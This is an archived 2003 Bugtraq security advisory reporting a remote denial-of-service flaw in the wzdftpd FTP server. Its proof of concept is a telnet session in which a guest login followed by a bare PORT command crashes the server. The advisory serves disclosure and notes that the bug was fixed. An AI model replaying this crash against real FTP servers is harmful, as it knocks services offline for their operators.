wzdftpd remote DoS

From: Roman Bogorodskiy (bogorodskiy_at_inbox.ru)
Date: 06/27/03

  • Next message: Steven M. Christey: "Re: TA-2003-06 Directory Transversal Vulnerability in iWeb Server"
    Date: Fri, 27 Jun 2003 21:16:17 +0400
    To: bugtraq@securityfocus.com
    
    

    Title: wzdftpd remote DoS
    Affected: wzdftpd <= 0.1rc4
    URL: http://www.wzdftpd.net
    Risk: High
    Exploitable: Yes
    Remote: Yes
    Date: June, 27 2003

    Overview:
    "A portable, modular and efficient ftp server, supporting SSL,
    winsock, multithreaded, modules ,externals scripts. unix-like
    permissions+acls, virtual users/groups, security, speed, bandwith
    limitation (user,group,global), group admins, per command auth"

    Description:
    wzdftpd crashes after sending command "PORT" w/out args.

    $> telnet 127.0.0.1 21
    Trying 127.0.0.1...
    Connected to localhost.novel.ru.
    Escape character is '^]'.
    220 wzd server ready.
    USER guest
    331 User guest okay, need password.
    PASS any
    230 User logged in, proceed.
    PORT
    Connection closed by foreign host.
    $> telnet 127.0.0.1 21
    Trying 127.0.0.1...
    telnet: connect to address 127.0.0.1: Connection refused
    telnet: Unable to connect to remote host

    So, we see server is down.
    Jun 11 23:00:33 fbd kernel: pid 7149 (lt-wzdftpd), uid 0: exited on signal 11 (core dumped)

    This bug is fixed on June, 12 in a CVS version.

    -Roman Bogorodskiy [Novel]


  • Next message: Steven M. Christey: "Re: TA-2003-06 Directory Transversal Vulnerability in iWeb Server"

    Relevant Pages

    • Re: RDP access to SBS 2003 - HELP please
      ... Try the remote desktop connection to see if it works. ... This occurs from home and also from within the LAN where the server is ... I tried telnet and it hangs perhaps indefinitely, ... I can't tell whether port 3389 is open, ...
      (microsoft.public.windows.server.sbs)
    • Re: wierd exchange problem
      ... When i tried to telnet to an extermal mail server i could not though. ... you need to verify that you can get to the remote ... >>> MessageOne ...
      (microsoft.public.exchange.admin)
    • Re: User access form remote Site ove managed VPN
      ... I have noticed whilst working at the remote site that I cannot remote ... maybe try using the IP address of the server to telnet to rather ... the basic directions for implementing a terminal server on SBS2003 domain. ... Notice no Listening RDP Port 3389 ??? ...
      (microsoft.public.windows.terminal_services)
    • Re: Remote Desktop Fails on Server 2K3 After Every Restart
      ... I was able to ping both ways but I haven't tried the Telnet option yet. ... Terminal Services service options are grayed out both via remote computer ... for messages about the Terminal Server service. ...
      (microsoft.public.windows.server.general)
    • SecurityFocus Microsoft Newsletter #152
      ... MICROSOFT VULNERABILITY SUMMARY ... Real Networks Helix Universal Server Remote Buffer Overflow ... ... NEW PRODUCTS FOR MICROSOFT PLATFORMS ...
      (Focus-Microsoft)

    Loading